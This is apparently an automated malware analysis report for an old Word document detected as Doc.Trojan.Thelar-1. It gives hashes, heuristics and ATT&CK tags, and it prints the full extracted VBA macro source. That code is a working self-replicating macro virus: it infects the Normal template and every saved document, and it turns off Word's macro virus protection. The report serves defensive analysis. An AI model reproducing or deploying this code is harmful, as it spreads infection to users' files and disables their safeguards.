Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 74a0a6dbb929d48d…

MALICIOUS

Office (OLE)

32.0 KB Created: 2001-08-17 06:05:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: cccb284ace9ebd7dcd6c51d925c37326 SHA-1: 4896484cdfe7916ee7710b92f21fc55608c0f351 SHA-256: 74a0a6dbb929d48d4fc03bc9d12000fc148d522304561df9719730893f23862f
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The presence of a Document_Open macro and legacy WordBasic auto-exec markers indicates malicious intent. The VBA script attempts to inject code into a new module named 'NewMacros' and potentially execute it. The script also includes logic for 'FileSave' and 'FileSaveAs' which may be used to further obfuscate or deliver the payload. The ClamAV detection 'Doc.Trojan.Thelar-1' further supports the malicious classification.

Heuristics 4

  • ClamAV: Doc.Trojan.Thelar-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thelar-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3743 bytes
SHA-256: 2bb2603e987d8dff0755accea6aabd5e822c55bac808554cc1e5d3fd91f7eff2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Doc
End Sub
Private Sub Doc()
Dim x As Object, y As Long, z As Long, q As Object
Dim a As Byte, b As Byte, v As Object
Set q = Application.VBE.VBProjects("Normal")
On Error GoTo thing
a = q.VBComponents.Count
For b = 1 To a
If q.VBComponents(b).Name = "NewMacros" Then GoTo there
Next b
On Error GoTo newobject
q.VBComponents.Add (vbext_ct_StdModule)
q.VBComponents(a + 1).Name = "NewMacros"
there:
Set x = q.VBComponents("NewMacros").CodeModule
here:
y = x.CountOfLines
If x.Find("sóper znak", 1, 1, y + 1, 1) = True Then
Exit Sub
End If
z = Znajdz("Sub FileSave()", x, 1, y)
If z > 0 Then
x.InsertLines z + 1, "Norm"
y = y + 1
Else
x.InsertLines y + 1, "Sub FileSave()"
x.InsertLines y + 2, "Norm"
x.InsertLines y + 3, "On Error Resume Next"
x.InsertLines y + 4, "ActiveDocument.Save"
x.InsertLines y + 5, "End Sub"
y = y + 5
End If
z = Znajdz("Sub FileSaveAs()", x, 1, y)
If z > 0 Then
x.InsertLines z + 1, "Norm"
y = y + 1
Else
x.InsertLines y + 1, "Sub FileSaveAs()"
x.InsertLines y + 2, "Norm"
x.InsertLines y + 3, "On Error Resume Next"
x.InsertLines y + 4, "Dialogs(wdDialogFileSaveAs).Show"
x.InsertLines y + 5, "End Sub"
y = y + 5
End If
Set v = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
Przepisz v, x
Exit Sub
newobject:
Set x = Application.VBE.VBProjects("Normal").VBComponents("ThisDocument").CodeModule
GoTo here
thing:
End Sub
Private Sub Norm()
Dim x As Object, z As Long, y As Long
Dim v As Object
Options.VirusProtection = False
On Error GoTo thing
Set x = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
y = x.CountOfLines
If x.Find("sóper znak", 1, 1, y + 1, 1) = True Then
GoTo thing
End If
z = Znajdz("Sub Document_Open()", x, 1, y)
If z > 0 Then
On Error GoTo thing
x.InsertLines z + 1, "Doc"
Else
x.InsertLines y + 1, "Private Sub Document_Open()"
x.InsertLines y + 2, "Doc"
x.InsertLines y + 3, "End Sub"
End If
On Error GoTo newobject
Set v = Application.VBE.VBProjects("Normal").VBComponents("NewMacros").CodeModule
Przepisz v, x
GoTo thing
newobject:
Set v = Application.VBE.VBProjects("Normal").VBComponents("ThisDocument").CodeModule
Przepisz v, x
thing:
If Day(Date) Mod 5 = 0 Then
p = Second(Time) + Minute(Time) * 60 + Hour(Time) * 3600
On Error GoTo ding
With Selection
On Error GoTo ding
.Font.Size = 20
On Error GoTo ding
.TypeText ("And Now For Somenthing Completely Different ...")
Do While (Second(Time) + Minute(Time) * 60 + Hour(Time) * 3600 - p) < 5
Loop
For w = 1 To 5
.TypeParagraph
.TypeText ("... The Larch...")
Next w
.TypeParagraph
.TypeText ("... The Larch.")
End With
End If
ding:
End Sub
Private Sub Przepisz(Source As Object, Destination As Object)
Dim licznik As Long, ciag As String
licznik = Source.ProcCountLines("Doc", vbext_pk_Proc) + Source.ProcCountLines("Norm", vbext_pk_Proc) + Source.ProcCountLines("Przepisz", vbext_pk_Proc) + Source.ProcCountLines("Znajdz", vbext_pk_Proc)
ciag = Source.Lines(Znajdz("Sub Doc()", Source, 1, Source.CountOfLines), licznik)
Destination.InsertLines Destination.CountOfLines + 1, ciag
End Sub
Private Function Znajdz(Target As String, Object As Object, StartLine As Long, EndLine As Long) As Long
Dim CurrentLine As Long
Znajdz = 0
For CurrentLine = StartLine To EndLine
If Object.Find(Target, CurrentLine, 1, CurrentLine + 1, 1) = True Then
Znajdz = CurrentLine
Exit Function
End If
Next CurrentLine
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.